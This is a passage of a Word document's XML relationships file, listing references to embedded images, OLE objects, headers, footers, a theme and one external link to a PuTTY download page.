Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header5.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject40.bin"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject142.bin"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image185.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject16.bin"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject34.bin"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject63.bin"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject44.bin"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject107.bin"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image164.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject21.bin"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject158.bin"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject84.bin"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject116.bin"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image172.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject7.bin"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject25.bin"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject53.bin"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject74.bin"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject90.bin"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.png"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject125.bin"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject136.bin"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject41.bin"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject154.bin"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject80.bin"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject17.bin"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject143.bin"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image187.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject35.bin"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject45.bin"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject64.bin"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.jpeg"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject159.bin"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject86.bin"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject22.bin"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject109.bin"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject91.bin"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject117.bin"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image173.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject26.bin"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject54.bin"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject75.bin"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image179.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpg"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject3.bin"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.png"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject98.bin"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject110.bin"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.png"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject138.bin"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image166.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject42.bin"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject51.bin"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject70.bin"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject150.bin"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image188.png"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header6.xml"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.png"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject92.bin"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.png"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject118.bin"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject144.bin"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject8.bin"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject18.bin"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject37.bin"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject46.bin"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image167.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject31.bin"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject65.bin"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image180.png"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject160.bin"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.png"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.png"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject111.bin"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject127.bin"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject139.bin"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject13.bin"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject23.bin"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image161.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject60.bin"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.png"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image174.png"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject156.bin"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject104.bin"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject55.bin"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject76.bin"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image168.png"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image181.png"/><Relationship Id="rId373"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image" Target="media/image119.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject87.bin"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject99.bin"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject4.bin"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject112.bin"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject128.bin"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject131.bin"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject19.bin"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject71.bin"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject145.bin"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject151.bin"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image189.png"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.png"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject93.bin"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject9.bin"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.png"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject119.bin"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject14.bin"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject38.bin"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject47.bin"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject66.bin"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.png"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject140.bin"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image169.png"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject155.bin"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject161.bin"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject32.bin"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId234"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141.png"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.png"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject129.bin"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject61.bin"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject132.bin"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image162.png"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image175.png"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject157.bin"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject27.bin"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject79.bin"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject82.bin"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject94.bin"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject105.bin"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject120.bin"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject5.bin"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject56.bin"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.png"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header9.xml"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image182.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject24.bin"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject77.bin"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject162.bin"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.png"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject100.bin"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject113.bin"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject130.bin"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.png"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject146.bin"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject152.bin"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject20.bin"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject72.bin"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image190.png"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.jpeg"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header8.xml"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.png"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image147.png"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject121.bin"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject39.bin"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject48.bin"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject141.bin"/><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oleObject" Target="embeddings/oleObject15.bin"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject33.bin"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject67.bin"/><Relationship Id="rId334" 